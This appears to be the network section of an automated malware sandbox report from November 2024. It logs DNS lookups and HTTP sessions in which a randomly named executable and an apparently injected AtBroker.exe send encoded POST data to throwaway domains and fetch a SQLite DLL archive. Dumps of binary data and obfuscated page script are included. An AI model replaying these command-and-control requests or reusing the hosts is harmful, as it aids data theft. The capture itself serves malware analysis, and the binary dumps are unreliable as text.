                                                                                                                            Nov 7, 2024 10:52:27.290522099 CET8.8.8.8192.168.2.220x74a2No error (0)www.iuyi542.xyziuyi542.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:27.290522099 CET8.8.8.8192.168.2.220x74a2No error (0)iuyi542.xyz38.47.237.27A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:41.073148966 CET8.8.8.8192.168.2.220xb64bNo error (0)www.neg21.topneg21.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:41.073148966 CET8.8.8.8192.168.2.220xb64bNo error (0)neg21.top206.119.81.36A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:54.904448986 CET8.8.8.8192.168.2.220x8aa0No error (0)www.digitaladpro.shopghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:52:54.904448986 CET8.8.8.8192.168.2.220x8aa0No error (0)ghs.google.com142.250.185.115A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:08.888133049 CET8.8.8.8192.168.2.220x9b25No error (0)www.loginov.enterprisesloginov.enterprisesCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:08.888133049 CET8.8.8.8192.168.2.220x9b25No error (0)loginov.enterprises3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:08.888133049 CET8.8.8.8192.168.2.220x9b25No error (0)loginov.enterprises15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:22.184883118 CET8.8.8.8192.168.2.220xf915No error (0)www.wcp95.topwcp95.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:22.184883118 CET8.8.8.8192.168.2.220xf915No error (0)wcp95.top154.23.184.95A (IP address)IN (0x0001)false
                                                                                                                            Nov 7, 2024 10:53:36.014906883 CET8.8.8.8192.168.2.220x2398No error (0)www.hasthosting.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                                                                            • www.jllllbx.top
                                                                                                                            • www.sqlite.org
                                                                                                                            • www.college-help.info
                                                                                                                            • www.binacamasala.com
                                                                                                                            • www.marketplacer.top
                                                                                                                            • www.energyparks.net
                                                                                                                            • www.yvrkp.top
                                                                                                                            • www.flikka.site
                                                                                                                            • www.ladylawher.shop
                                                                                                                            • www.primeproperty.property
                                                                                                                            • www.kghjkx.xyz
                                                                                                                            • www.iuyi542.xyz
                                                                                                                            • www.neg21.top
                                                                                                                            • www.digitaladpro.shop
                                                                                                                            • www.loginov.enterprises
                                                                                                                            • www.wcp95.top
                                                                                                                            • www.hasthosting.xyz
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.2249161156.234.28.9480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:06.780059099 CET529OUTGET /s7rc/?Vta=nFypuDtholF&mFptYb=6DRnIJ+Fte42OB/5XetGdeOJ+lOhphxOvMg5DpP/yyjJNxXWq01mRUwFVex1iRDtTe4NkeQHEQ9jZsZ13oeWt1010btNzgPMSC+IqSdDnCJo+Vo0XkUS70+rul7v HTTP/1.1
                                                                                                                            Host: www.jllllbx.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:50:07.758430004 CET1236INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:07 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Set-Cookie: _sessionsid=OTE2YzNjMjUwYmRjYjM5ODAwMzY0NTY3ZjQwMThkNjE=; path=/; expires=Thu, 14 Nov 2024 09:50:07 GMT
                                                                                                                            Data Raw: 37 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 32 33 34 34 38 3b 26 23 33 32 35 39 33 3b 26 23 34 35 3b 26 23 36 35 3b 26 23 38 30 3b 26 23 38 30 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 [TRUNCATED]
                                                                                                                            Data Ascii: 71d<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><title>&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;</title><meta name="keywords" content="&#84;&#67;&#71;&#24425;&#31080;&#23448;&#32593;&#45;&#65;&#80;&#80;&#19979;&#36733;"/><meta name="description" content="&#9917;&#65039;&#9917;&#65039;&#9917;&#65039;&#84;&#67;&#71;&#24425;&#31080;&#65;&#80;&#80;&#55356;&#57144;&#121;&#107;&#49;&#56;&#56;&#46;&#99;&#99;&#9989;&#39030;&#32423;&#19979;&#27880;&#24179;&#21488;&#44;&#25552;&#20379;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#44;&#84;&#67;&#71;&#24425;&#31080;&#26368;&#26032;&#23448;&#32593;&#44;&#84;&#67;&#71;&#24425;&#31080;&#97;&#112;&#112;&#19979;&#36733;&#44;&#21508;&#31181;&#23089;&#20048;&#21697;&#31181;&#24212;&#26377;&#23613;&#26377;&#44
                                                                                                                            Nov 7, 2024 10:50:07.758529902 CET212INData Raw: 3b 26 23 38 34 3b 26 23 36 37 3b 26 23 37 31 3b 26 23 32 34 34 32 35 3b 26 23 33 31 30 38 30 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 33 34 34 38 3b 26 23 32 36 30 34 31 3b 26 23 32 33 34 35 38 3b 26 23 32 36 33 38 31 3b 26 23
                                                                                                                            Data Ascii: ;&#84;&#67;&#71;&#24425;&#31080;&#32593;&#31449;&#23448;&#26041;&#23458;&#26381;&#50;&#52;&#23567;&#26102;&#22312;&#32447;&#20026;&#24744;&#26381;&#21153;&#33;"/><script>if(navigator.userAgent.toLocaleLowerCase
                                                                                                                            Nov 7, 2024 10:50:07.758539915 CET683INData Raw: 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e7 bd 91 e7 ab 99 e6 ad a3 e5 9c a8 e7 bb b4 e6 8a a4 e5 8d 87 e7 ba a7 e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90
                                                                                                                            Data Ascii: ().indexOf("baidu") == -1){document.title =""}</script><script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.224916245.33.6.223803596C:\Windows\SysWOW64\AtBroker.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:12.457195997 CET275OUTGET /2021/sqlite-dll-win32-x86-3350000.zip HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Host: www.sqlite.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Nov 7, 2024 10:50:13.083417892 CET249INHTTP/1.1 200 OK
                                                                                                                            Connection: keep-alive
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:13 GMT
                                                                                                                            Last-Modified: Mon, 15 Mar 2021 12:22:51 GMT
                                                                                                                            Cache-Control: max-age=120
                                                                                                                            ETag: "m604f519bs7c92b"
                                                                                                                            Content-type: application/zip; charset=utf-8
                                                                                                                            Content-length: 510251
                                                                                                                            Nov 7, 2024 10:50:13.083436012 CET1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 d9 b6 6c 52 95 50 58 cd 6a 05 00 00 b3 16 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 ca 8e 4b 60 ca 8e 4b 60 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 92 e4 26 0c 80 ef fb 36 bb 93
                                                                                                                            Data Ascii: PKlRPXjsqlite3.defUTK`K`ux&69$(lnv0xt#9??"9d1[#%!yIo2_Z0.qZpT"&mb3E-g&GLho#98]<
                                                                                                                            Nov 7, 2024 10:50:13.083458900 CET1236INData Raw: 89 60 61 c2 c6 8f 5f 51 2a c5 e8 12 cc 22 d9 ce 3c a9 17 c4 ba 71 c2 48 06 3b 69 93 e7 0b 24 96 3c 09 7b fb ef c8 ee c9 2a 0d a6 59 fa 41 c8 59 4f 66 ec 79 11 2d 8e 3b a0 93 f2 f6 f4 14 b5 19 fc a4 6d 02 3f 29 cb df 15 75 87 ef b2 37 c5 9d 55 f8
                                                                                                                            Data Ascii: `a_Q*"<qH;i$<{*YAYOfy-;m?)u7UFO0`S)0e{S;4hsf[fA&i'8T-g2bIo0>cP[=K`w5ZdzvS,brD'K4Hm/PKlRW^
                                                                                                                            Nov 7, 2024 10:50:13.083471060 CET424INData Raw: a8 05 0a 1c 80 97 70 87 eb f4 c6 8b 64 7e 9a fa 68 73 bc a9 35 06 a1 11 53 6b 8c cd 78 72 06 5b 63 1c c6 f3 8b 31 d8 ce 89 9d f7 01 be 85 62 a1 1a e5 2f bd c8 fa 21 74 3b bc bc a4 88 b7 99 b0 35 f6 a0 56 06 fd 65 c5 1f 86 08 e1 d5 c9 50 5a a8 6f
                                                                                                                            Data Ascii: pd~hs5Skxr[c1b/!t;5VePZo4$L8GmzaFPhT{}C+I9"vij2iA8bz5H16?&Qb|"4n|N|pa`)/{!zBy'-h60JW9
                                                                                                                            Nov 7, 2024 10:50:13.083481073 CET1236INData Raw: 71 d4 be 5e a1 95 c1 0b d1 9f e4 a0 35 cb 51 fb 0e 3c 6d 8c 23 fa 43 69 33 b5 03 a2 59 00 54 0c 73 a5 cf 81 45 2c e7 23 ec ca b1 a6 14 91 31 2e 35 8f 26 53 c9 4a fd 36 b2 14 c6 73 05 8c 27 9f 46 c4 34 ec 49 7b b8 d8 2a ef 9b c7 08 e3 ff 3d 70 5b
                                                                                                                            Data Ascii: q^5Q<m#Ci3YTsE,#1.5&SJ6s'F4I{*=p[J(f2CkG^VQZ.[t&O@vLXgX*.^<ZPufP*@FK'4;-n?W]m.JU%E)--NDR0g~)33:%nW@7Y
                                                                                                                            Nov 7, 2024 10:50:13.083492994 CET1236INData Raw: 0d e9 68 23 5e 95 f8 fa 58 f7 96 aa f5 29 89 42 c3 d5 c1 17 b1 01 bc b8 70 0f 76 e2 ba 91 84 a1 f3 ac 1f b1 07 5b 84 3d cd e4 f8 6b 5c 7f d2 08 68 18 1b 1c 95 31 f2 b0 69 e3 24 ea ed 6b 35 e9 3a ab 36 2d 47 7b af e6 a4 d4 07 53 58 a5 85 7d 84 33
                                                                                                                            Data Ascii: h#^X)Bpv[=k\h1i$k5:6-G{SX}3V"I9Y%YWj>{d\uk.Sv BK{zp4[>S,8d7aa7]h<39`c@0n?){OBRCON_O&}PZVu]hR6eGz
                                                                                                                            Nov 7, 2024 10:50:13.083503962 CET424INData Raw: 84 c3 2c 45 80 30 8b 09 4c c0 aa 07 e1 13 4c 17 3a 35 5c 60 c3 3a 73 ba a9 cb 53 f7 78 8d 75 93 85 16 a4 00 86 c1 c6 24 f1 66 b2 5f 3e fb 65 e0 0c 27 c5 42 91 29 da 94 52 f9 92 05 9f 76 b3 65 8f 4d 7a 69 fa 22 d7 67 c5 cb 48 b3 5a 8e a5 b8 53 e4
                                                                                                                            Data Ascii: ,E0LL:5\`:sSxu$f_>e'B)RveMzi"gHZSrW.om*')a5ZSj%#i{mZBE6|1M+:!dlB< `!\gJQ/Nv$WL#9vZbZ%KSI]Jj=09!vev'CI>8"_Bn^</
                                                                                                                            Nov 7, 2024 10:50:13.083520889 CET1236INData Raw: 33 1b b9 a4 f6 20 96 2c d2 58 1b 16 ef 24 8b 6c 74 91 95 5c 22 16 d2 a5 b6 a2 11 74 85 2c b2 6a d3 e9 32 2b b1 b7 e6 b0 e9 d2 9a a3 f3 ad b6 66 50 7f 48 db 78 05 99 b8 c4 1a 16 59 5b dd 0c a6 d5 cd 72 10 df 65 5a 7a 19 05 04 85 ca 79 6c 0a d4 d9
                                                                                                                            Data Ascii: 3 ,X$lt\"t,j2+fPHxY[reZzylw\W"<VK+YRlgNldaiew9%)F'RP%KiA9Wy|$*fcfbUM}fm1hu6_l`Y\(oM ug`=@/m
                                                                                                                            Nov 7, 2024 10:50:13.083533049 CET212INData Raw: d6 41 7b a4 2e 48 49 94 54 d7 a7 ac 3f ce 41 31 1e e2 6c cd d1 37 20 a0 4e ab 60 ac ab 26 bb 46 2b 53 33 8e ec e2 d9 28 3c 67 e7 06 ca e5 ab 50 b3 ae 72 b2 6a 4a 84 d5 43 56 e3 31 d4 f9 95 51 1f ea b7 16 0b 0d 8f 25 58 4a 61 80 2c d0 c1 1b 6f 50
                                                                                                                            Data Ascii: A{.HIT?A1l7 N`&F+S3(<gPrjJCV1Q%XJa,oP*pT<jUV6%8YnNl6mUOagdW61\<l4|acv @ggF#={`J^4%WOr(0&*0Y8cSg
                                                                                                                            Nov 7, 2024 10:50:13.083543062 CET1236INData Raw: 8e 27 05 6f 13 59 32 9f 54 2c a8 f3 c4 83 2e 37 26 22 81 4f 1e 43 7e 06 46 44 e1 51 a5 b0 17 18 03 8d 53 7f c6 0c 32 d2 2c 25 81 4c 00 45 e0 8a fa 06 ea 07 be a3 c4 0c 6c 07 f3 33 c6 83 62 20 1e 64 53 41 a8 f6 8a a1 b8 b2 59 45 8e ed 8d 61 66 02
                                                                                                                            Data Ascii: 'oY2T,.7&"OC~FDQS2,%LEl3b dSAYEafL/}CC/e2tiP.ea}CCiJx$!`6|QzBrXQCbUTWUz=y+ItiA<aO']RU9)")KiNApH=in"6dqA.ZZN
                                                                                                                            Nov 7, 2024 10:50:13.088874102 CET1236INData Raw: de 6c 37 19 15 d7 59 e8 31 72 00 ac 02 94 b2 60 99 2d 9d 68 1d 50 0b f1 75 80 0c 06 5b c0 a1 00 b3 cc 4b b3 d3 58 b6 b2 94 9d 86 ab 4a 4a 3e a6 59 c3 8f a4 d6 06 c1 02 a0 be 8e ea 69 e4 2e 9a cf 2b 2b 79 e8 3b 9e b4 68 1f 92 b5 bc 36 0b d7 00 78
                                                                                                                            Data Ascii: l7Y1r`-hPu[KXJJ>Yi.++y;h6x7ogZ1u38np CkCGZl*7E;qqbz9-i*<P}H?o:sa-Ey<"#n8%qcGi#ij2y8m


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.224916338.88.82.5680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:23.189984083 CET2472OUTPOST /fu91/ HTTP/1.1
                                                                                                                            Host: www.college-help.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.college-help.info
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.college-help.info/fu91/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 4b 58 62 46 59 64 78 42 76 41 48 48 50 4c 53 67 6f 46 43 4b 33 37 49 50 78 45 47 35 69 4a 6e 38 59 4f 51 33 42 6d 51 74 67 49 30 55 56 64 4c 71 63 69 79 35 5a 35 32 4d 58 4c 5a 46 73 7a 6a 7a 75 69 2b 63 4c 61 62 6c 73 5a 65 68 57 51 37 31 4e 37 75 49 4d 42 41 6a 30 64 74 52 30 79 69 34 45 72 43 77 70 79 66 66 54 42 6e 6b 56 30 6e 5a 4d 6c 2b 68 32 33 77 78 66 32 74 4e 65 44 65 43 4a 61 57 56 47 6d 4e 47 57 37 53 38 4d 6d 73 2b 50 35 33 2f 38 53 59 62 47 4b 47 33 65 48 59 68 68 30 54 4a 48 46 79 70 78 36 41 54 47 36 72 7a 71 2b 48 34 39 2b 4b 63 5a 61 37 57 4f 7a 43 45 48 43 33 77 4b 73 58 48 66 4d 33 6b 6f 2f 4e 71 66 57 31 74 61 76 6a 76 5a 69 48 34 6b 41 31 6a 75 69 45 78 4e 51 33 48 6c 50 35 35 53 68 71 76 53 49 54 78 39 78 49 41 35 6a 47 36 32 68 6d 61 69 79 78 58 66 62 4f 63 76 6f 74 65 68 36 75 78 64 58 2f 39 44 52 64 30 77 47 32 76 73 37 6e 53 69 37 5a 4a 75 31 59 5a 4f 2b 42 6c 4f 48 52 69 73 39 69 50 33 59 4c 67 51 53 76 75 4a 43 74 4e 6f 35 44 45 54 5a 45 38 35 62 34 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=KXbFYdxBvAHHPLSgoFCK37IPxEG5iJn8YOQ3BmQtgI0UVdLqciy5Z52MXLZFszjzui+cLablsZehWQ71N7uIMBAj0dtR0yi4ErCwpyffTBnkV0nZMl+h23wxf2tNeDeCJaWVGmNGW7S8Mms+P53/8SYbGKG3eHYhh0TJHFypx6ATG6rzq+H49+KcZa7WOzCEHC3wKsXHfM3ko/NqfW1tavjvZiH4kA1juiExNQ3HlP55ShqvSITx9xIA5jG62hmaiyxXfbOcvoteh6uxdX/9DRd0wG2vs7nSi7ZJu1YZO+BlOHRis9iP3YLgQSvuJCtNo5DETZE85b4gcpdIoDHh3/SujsgS/oz5nP12HN3oeJqqmZLZrb5fOtwYeeVzEAswWUMUzXQy+SKmBuWmJIEgVdPOrC+FS5NL/fuLrIx5ij2V7mx+yqeduYyxV+7dw71TDtkwULTv5JnyM25kl5lYfCr6JIOsD5dFBRlnB8VVt/kP9EvwTFfrmL7+ef4YpPTue4BjzAZhfQBbQeRBYCG1BDzxp73B8pnCQlCF2T0IhaGeVyuPDx6acHayOSukRHcOCfcPbIVeBf00XVfn+5NYH0lKDC2Z52pJCvo3f/6mPR196L7KdAYwydON+2DUWGzfvlpvmR0w/2yGnRRNinv4U8ebJ1CZ6hxhMn9rVmgAq7gpkMOt2SNeo5ypiDu9++DARMF/xyBWWT1mqu75Xivf8U6EKn3KZ8cRQWmEm8rIQNfrntxIMc5cLcWjGub8Ehs7zMQa7BW5l7s6i+fo7CALnGTOf05+k4inz7+KoDLuBeB72ULuBIMWCbw+eH/hcGInC8ThzaGYiCA4kOvj4UVuRqM9Tw1mqP4f4zjgEwJh3nbckkTfZhPqyq4wvnEYtU03zKAoCqKTJB0r3liDJ0TOyXiJ2WNiTVKFt507U1++I5Kn9aXhTrIH85bb1k5M3rm84/06C4Z8n8YylN9e+1CTyD0NqWlxvlTX8D7vxdHhzZQxX [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:23.418241978 CET294OUTData Raw: 41 4d 56 31 61 66 69 6f 6e 4f 42 58 42 77 4b 2b 68 68 79 6f 33 50 6a 6f 4b 51 73 41 79 68 38 4f 39 45 7a 5a 64 6e 31 31 76 66 58 55 51 46 41 64 58 34 4a 34 46 4d 41 72 31 74 46 4c 65 2f 63 76 57 59 4a 55 4b 32 42 74 70 35 4d 54 32 39 31 45 49 73
                                                                                                                            Data Ascii: AMV1afionOBXBwK+hhyo3PjoKQsAyh8O9EzZdn11vfXUQFAdX4J4FMAr1tFLe/cvWYJUK2Btp5MT291EIswGHZ51P7VWSCIenkgpLByE2jB4lYVAnkKcag2DUu+dj57YyfgXV2sMSxG+UatvJfXw2bEm2WTF6Vjoy7vtQ0erPDr9wd7QD3qgxovcXryHPl8UOTajNSbVCdDg2372LrsjH6aDMSFRYtv8HycQvDuWT+f1I/Yd8uF
                                                                                                                            Nov 7, 2024 10:50:23.887725115 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:23 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
                                                                                                                            ETag: "49d-626426de29b28"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 1181
                                                                                                                            Content-Type: text/html
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                                            Nov 7, 2024 10:50:23.889235020 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                                            Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.224916438.88.82.5680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:25.735951900 CET805OUTPOST /fu91/ HTTP/1.1
                                                                                                                            Host: www.college-help.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.college-help.info
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.college-help.info/fu91/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 4b 58 62 46 59 64 78 42 76 41 48 48 50 4d 6d 67 6f 55 43 4b 32 62 49 50 77 45 47 35 6f 70 6e 32 59 4f 63 56 42 69 49 39 67 35 38 55 56 4a 62 71 64 55 47 35 59 35 32 44 63 72 5a 42 30 54 6a 69 75 69 2f 4e 4c 59 2f 6c 73 5a 4b 68 58 7a 54 31 45 66 43 4c 4f 78 41 6c 68 74 74 51 30 79 76 47 45 72 4f 67 70 7a 33 66 54 44 6a 6b 57 77 4c 5a 4a 41 53 68 7a 48 77 37 4f 6d 73 56 65 44 53 74 4a 61 47 6e 47 6d 78 47 57 4b 2b 38 4d 30 6b 2b 4c 75 62 2f 7a 79 59 65 49 71 48 47 59 48 31 4d 75 55 50 46 4c 30 43 59 33 4a 49 46 4e 39 54 4f 6e 38 50 4c 35 39 43 6a 58 38 53 33 50 44 75 42 64 67 3d 3d
                                                                                                                            Data Ascii: mFptYb=KXbFYdxBvAHHPMmgoUCK2bIPwEG5opn2YOcVBiI9g58UVJbqdUG5Y52DcrZB0Tjiui/NLY/lsZKhXzT1EfCLOxAlhttQ0yvGErOgpz3fTDjkWwLZJAShzHw7OmsVeDStJaGnGmxGWK+8M0k+Lub/zyYeIqHGYH1MuUPFL0CY3JIFN9TOn8PL59CjX8S3PDuBdg==
                                                                                                                            Nov 7, 2024 10:50:26.437747002 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:26 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
                                                                                                                            ETag: "49d-626426de29b28"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 1181
                                                                                                                            Content-Type: text/html
                                                                                                                            Connection: close
